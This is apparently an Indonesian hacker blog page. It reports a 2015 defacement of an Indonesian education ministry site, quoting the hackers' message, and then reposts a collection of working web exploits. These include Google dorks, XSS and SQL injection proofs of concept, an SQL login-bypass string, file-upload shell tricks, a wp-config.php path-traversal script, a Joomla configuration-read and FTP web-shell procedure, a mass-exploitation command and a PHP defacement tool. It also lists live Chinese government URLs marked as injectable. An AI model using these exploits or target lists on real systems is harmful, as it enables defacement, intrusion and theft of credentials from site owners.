-

Tuesday, 26 May 2015

Kemdikbud di hajar Hacker Pagi ini!


Pada hari Rabu, 27 Mei 2015 pukul 09.42 Situs Kementerian Pendidikan dan Kebudayaan Republik Indonesia Direktorat Jenderal Pendidikan Anak Usia Dini, Nonformal dan Informal di hajar Hacker atas nama grup Java Intelegent Cyber dan Banten Cyber Attacker Team ( Memberal_Force & Gurita4Cyber )


Message To Indonesia Government ~!~
Kami Ingin mempertanyakan dimana keuangan Negara? dan kemanakah Hukum dan HAM yang berlaku?
apa Itu hanya omong kosong? Sebanyak 75 Persen Sekolah di Indonesia Tak Penuhi Standar ! Rakyat indonesia hanya butuh action dan perhatian dari pemerintah ! Bukan hanya OMONG BESAR! dan untuk anda, Presiden Indonesia, Ir. H. Joko Widodo Kami juga mempertanyakan kemana janji" anda?!? Rakyat menjerit, semua kebutuhan naik. HUKUM hanya seperti paku, yang tajam ke bawah dan tumpul ke atas! Kembali ke system Demokrasi yang dari rakyat oleh rakyat dan untuk rakyat
apakah itu sudah tidak berlaku di negeri yang penuh kebohongan dan permainan ini?
Korupsi Merajalela, Merampas semua uang rakyat, hingga saat ini, Banyak rakyat Indonesia yang hidup dalam kemiskinan.
Kami harap, Pemerintah bisa lebih tegas dalam menerapkan Hukum, Bertindak tegas untuk membangun pendidikan Indonesia Yang lebih maju, dan Mengelola tanah indonesia sebaik-baik nya, Tidak seperti di pertambangan emas di papua, migas di blok cepu, dan sebagainya. Rakyat hanya bisa melihat orang orang asing merauk keuntungan yang besar dari tanah negara indonesia. Semoga indonesia bisa menjadi lebih baik,

begitulah pesan yang di sampaikan hacker itu dalam halaman deface page nya. Sampai saat ini, Situs itu masih dikuasi Hacker dan di duga situs itu telah di tanam akses root dan Shell,.
Memberal_Force juga pernah meretas situs Christian School ~> http://www.christiantoday.com/article/fbi.probes.hacking.of.christian.school.website/50181.htm


Semoga Pemerintah Indonesia Peka terhadap pesan yang di sampaikan hacker ini ^_^ ini juga demi kebaikan negara indonesia :)


src: Banten Cyber Attacker Team

ATOMYMAXSITE CMS Multiple Vulnerability

# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"

# Date: 5/05/2015
 
# Tested on: Kali Linux
 
Interductions:



ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers.





Cross Site Scripting (Refelected)

-========================================



An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways :



Poc:



http://site.com/main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E



GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1

Host: www.pck1.go.th

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95

Connection: keep-alive

HTTP/1.1 200 OK

Date: Tue, 05 May 2015 10:35:21 GMT

Server: Apache/2.2.22 (Ubuntu)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 10728

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=tis-620





Sql Injection

=============================



In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases



And Collect All Usernames And Passwords .



PoC:



http://www.site.com/main/index.php?name=gallery&op=gallery_detail&id=[sql]
 
Sumber : http://www.exploit4arab.net 

boomchat-v4.2 Upload Vulnerability

| # Dork     : no 4 noob

| # Tested on: Win8 fr pro

| # Bug      : Upload

| # Download : www.20script.ir

=======================================

1- register in script 4 chat

2- change photo of profil

3- chang evil from 1.php to 1.php.jpg

4- go to http://127.0.0.1/bmchat/avatar/peter85467529.php
 
Sumber: http://www.exploit4arab.net/ 

Macro Info Solution Bypass

 
Dork : Powered By : Macro Info Solutions
 
Poc :

http://www.target.com/admin/



Username : ' or 1=1 limit 1 -- -+

Password : ' or 1=1 limit 1 -- -+
 
Salam ./51N1CH1 :) 

sumber : http://www.exploit4arab.net/

Wordpress Revolution Slider

    #!/bin/bash
    # EXPLOIT COMPLEMENTO SCANNER INURLBR:
    # ./inurlbr.php --dork 'admin-ajax.php?action=revolution'  -s revolution.txt -q 1,6 [...]
    #  --comand-all 'bash script.sh "http://_TARGET_" "/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php"'
     
    # Exemple: bash script.sh http://target.br you_exploit
    # Exec:    bash script.sh http://target.gov.br '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
     
    curl -s "$1$2" | grep 'DB_' > /dev/null && echo "[+] $1$2" | tee -a /output/wp-out-curl.txt || echo not vuln;
     
    sumber:pastebin

List Vuln web Gov.cn POC SQLI

    http://www.tanbu.gov.cn/investDetails.php?newsid=1?'´0x27
    www.tanbu.gov.cn/investDetails.php?newsid=1?'´0x27
    http://www.hnsqjgdj.gov.cn/node.php?tid=849?'´0x27
    www.hnsqjgdj.gov.cn/node.php?tid=849?'´0x27
    http://www.zjcxrc.gov.cn/main/viewCompany?code=4624:?'´0x27
    www.zjcxrc.gov.cn/main/viewCompany?code=4624:?'´0x27
    http://www.hnsqjgdj.gov.cn/article_news.php?aid=3238?'´0x27
    www.hnsqjgdj.gov.cn/article_news.php?aid=3238?'´0x27
    http://www.hnsqjgdj.gov.cn/article_news.php?aid=3241?'´0x27
    www.hnsqjgdj.gov.cn/article_news.php?aid=3241?'´0x27
    http://www.hnsqjgdj.gov.cn/article_news.php?aid=3239?'´0x27
    www.hnsqjgdj.gov.cn/article_news.php?aid=3239?'´0x27
    http://www.bsqy.gov.cn/xwzx.class.php?'´0x27
    www.bsqy.gov.cn/xwzx.class.php?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=383?'´0x27
    www.tanbu.gov.cn/govAffairsDetails.php?newsid=383?'´0x27
    http://www.sipqts.gov.cn/nami/web/index.php/product/35ee0e89be8d0805dca6da9f441a15c0/?'´0x27
    http://www.hnsqjgdj.gov.cn/list_news.php?tid=&page=1?'´0x27
    www.hnsqjgdj.gov.cn/list_news.php?tid=
    http://www.tanbu.gov.cn/investVideos.php?typeid=159?'´0x27
    www.tanbu.gov.cn/investVideos.php?typeid=159?'´0x27
    http://www.shzqx.gov.cn/data/aws/daily.php?station=Y4147&time=201310&query=查询&prev=上一页&next=下一页?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=370?'´0x27
    www.tanbu.gov.cn/govAffairsDetails.php?newsid=370?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=381&channelid=&channel=&type=&typeid=
    www.tanbu.gov.cn/govAffairsDetails.php?newsid...?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=382?'´0x27
    www.tanbu.gov.cn/govAffairsDetails.php?newsid=382?'´0x27
    http://old.gl.gov.cn/xzffdt/catalog.php?catalogid=34?'´0x27
    http://www.nbjdda.gov.cn/plus/docs.php?typeid=236&skey=&stype=236&adv=a&ss_x=&totalresult=10?'´0x2796&pageno=10?'´0x27
    http://www.lytgb.gov.cn/newsInfo.php?nid=28?'´0x275&parent_id=8?'´0x27
    www.lytgb.gov.cn/newsInfo.php?nid=285?'´0x27
    http://www.lytgb.gov.cn/newsInfo.php?nid=290&parent_id=8?'´0x27
    www.lytgb.gov.cn/newsInfo.php?nid=290?'´0x27
    http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=招商局赴上海开展招商活动?'´0x27
    http://www.lytgb.gov.cn/plistinfo.php?nid=351&parent_id=41?'´0x27
    www.lytgb.gov.cn/plistinfo.php?nid=351?'´0x27
    http://www.mjxzjj.gov.cn/LeaderInfo.php?pid=75?'´0x27
    www.mjxzjj.gov.cn/LeaderInfo.php?pid=75?'´0x27
    http://www.hnsqjgdj.gov.cn/list_news.php?tid=844?'´0x27
    www.hnsqjgdj.gov.cn/list_news.php?tid=844?'´0x27
    http://www.hflyw.gov.cn/photo/class/?9.html?'´0x27
    www.hflyw.gov.cn/photo/class/?9.html?'´0x27
    http://www.hfxly.gov.cn/news/class/?86.html?'´0x27
    www.hfxly.gov.cn/news/class/?86.html?'´0x27
    http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=保税区工商分局在全市工商系统注册管理知识竞赛中获佳绩?'´0x27
    http://www.tanbu.gov.cn/investDetails.php?newsid=1?'´0x27
    http://www.hnsqjgdj.gov.cn/node.php?tid=3242?'´0x27
    www.hnsqjgdj.gov.cn/node.php?tid%...?'´0x27
    http://www.zjcxrc.gov.cn/main/viewCompany?code=4624:?'´0x27
    http://www.hnsqjgdj.gov.cn/article_news.php?aid=3241?'´0x27
    http://www.hnsqjgdj.gov.cn/article_news.php?aid=3239?'´0x27
    http://www.hnsqjgdj.gov.cn/article_news.php?aid=3254?'´0x27
    http://www.bsqy.gov.cn/xwzx.class.php?'´0x27
    www.bsqy.gov.cn/xwzx.class.php?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=383?'´0x27
    http://www.hnsqjgdj.gov.cn/list_news.php?tid=&page=1?'´0x27
    http://www.sipqts.gov.cn/nami/web/index.php/product/35ee0e89be8d0805dca6da9f441a15c0/?'´0x27
    http://www.tanbu.gov.cn/investVideos.php?typeid=159?'´0x27
    http://www.shzqx.gov.cn/data/aws/daily.php?station=Y4147&time=201310&query=查询&prev=上一页&next=下一页?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=370?'´0x27
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=381&channelid=&channel=&type=&typeid=
    http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=382?'´0x27
    http://www.nbjdda.gov.cn/plus/docs.php?typeid=236&skey=&stype=236&adv=a&ss_x=&totalresult=10?'´0x2796&pageno=10?'´0x27
    http://old.gl.gov.cn/xzffdt/catalog.php?catalogid=34?'´0x27
    http://www.lytgb.gov.cn/newsInfo.php?nid=28?'´0x275&parent_id=8?'´0x27
    http://www.lytgb.gov.cn/newsInfo.php?nid=290&parent_id=8?'´0x27
    http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=财政局举办财税政策座谈会?'´0x27
    http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=招商局赴上海开展招商活动?'´0x27
    http://www.lytgb.gov.cn/newsInfo.php?nid=223&parent_id=8?'´0x27
    http://www.lytgb.gov.cn/plistinfo.php?nid=351&parent_id=41?'´0x27
    www.lytgb.gov.cn/plistinfo.php?ni...?'´0x27
    http://www.mjxzjj.gov.cn/LeaderInfo.php?pid=75?'´0x27

Priv8 Exploit Upload Shell Via FTP CMD (Joomla)

- Author: CoderSec
- Date: 25/07/2014
- Tested on : Windows

Dork:
inurl:/download.php?file=
inurl:/force-download.php?file=
Explorer ur brain
 
Get Database :
ww.site.com/download.php?file=configuration.php
ww.site.com/force-download.php?file=configuration.php
 
Find FTP User And FTP Password On Database :
var $Ftp_User : 'user'
var $Ftp_pass : 'user'
var $Ftp_root : 'public_html'
 
Upload Shell via FTP CMD
1. Open CMD
Example :
C:\Documents and Settings\USER> ftp site.com
to www.site.com
Connected to site.com
username : user
331 Password Required for example
Password : password
user Loged in
ftp> ls
public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
ftp>cd public_html
ftp> put "C:\CoderSec.php" << shell
Command Success
File Transfered
 
Shell Access :
 
www.site.com/CoderSec.php
 
Live Target :
 
http://hisardoot.co.il/ISD/knife%20..%20configuration.php
 
Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg

miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL

# Vendor:        http://www.spyka.net/scripts/php/miniblo
 
  # Google Dork:   intext:"Powered by miniblog" ext:php
 
  # POC:           http://{YOU_URL}/adm/admin.php?mode=add
 
  # SEND REQUEST POST
  adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
  ------------------------------------------------------------------------------
 
  # EXECUTE:       php xpl.php -t http://target.us
 
  # FILE_OUTPUT :  miniblog_vuln.txt
 
  # EXPLOIT MASS USE SCANNER INURLBR
  php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  ------------------------------------------------------------------------------
 
 
 */
ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL
 
sumber: Pastebin

Wordpress Revolution Slider Exploit 2015

<?php

set_time_limit(0);
error_reporting(0);



print '

[*]==============================================================[*]

[+] Tool : Wordpress Revolution Slider Exploit 2015

[+] Coded By : s0w

[*] You Should Change The Hacker Nickname View => ( $indexName ) ..

[@] Used: php rev.php http://www.target.com

[*]==============================================================[*]

';


$site $argv[1];


/* your index name => */ $indexName '51N1CH1';


$karem = @file_get_contents("$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css");
$path "$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";



if (isset($argv[1])){

   

echo "Exploit & Scan Working !"."\n";



   
$post = array



(


"action" => "revslider_ajax_action",


"client_action" => "update_captions_css",


"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked By $indexName<br><p style='color: transparent'>"


);


$ch curl_init ($site."/wp-admin/admin-ajax.php");
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($chCURLOPT_CONNECTTIMEOUT5);
curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);
curl_setopt ($chCURLOPT_SSL_VERIFYHOST0);
curl_setopt ($chCURLOPT_POST1);
curl_setopt ($chCURLOPT_POSTFIELDS$post);
$data curl_exec ($ch);
curl_close ($ch);   

   

if (eregi("Hacked By",$karem)){

   

echo "\n"."\n";



echo "[+] Exploit Done [+]"."\n"$path;



echo "\n"."\n";

}else{

 

echo "[-] Exploit Failed ! [-]";

 

}   

   

}


// Finish Coded by s0w | Egyptian Shell Team //  


?>
 
 
 
 

deface phpBugTracker 1.7.5 Mulllti Vulnerability

 # Title    : phpBugTracker 1.7.5 Mulllti Vulnerability

 # Author   : indoushka

 # email    : indoushka4ever@gmail.com

 # Dork     : Maian Gallery v2.0. Copyright © 2006-2015 Maian Script World. All Rights Reserved

 # Tested on: Win 8.1 fr pro / 22:15 * 15/05/2015

 # Bug      : Mulllti

 # Download : https://github.com/a-v-k/phpBugTracker
 
By Pass Admin Panel :



http://127.0.0.1/phpBugTracker/admin/configure.php



SQL injection :



http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=1 ( inject her )



( XSS / HTML Inject ) :



http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=3%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E 

Deface dengan Behsamanco Cms File Upload Vulnerability

Hai Sobat hehe maaf jarang Post lagi di blog karena sibuk di grup/team JIC family .. oke tanpa basa basi ane kasih cara Deface dengan Behsamanco Cms File Upload Vulnerability silahkan simak :)

 Dork : inurl:Repositary/RadEditor/SentDoc/Guest/

Exploit : site.com/Pages/Admin/CKEditor/DocumentManager.aspx

Letak Shell Anda : site.com/Repositary/RadEditor/SentDoc/Guest/filename.txt

Salam ./51N1CH1 :) Java Intelegent Cyber

Sumber: http://www.exploit4arab.net/

Newer Posts Older Posts Home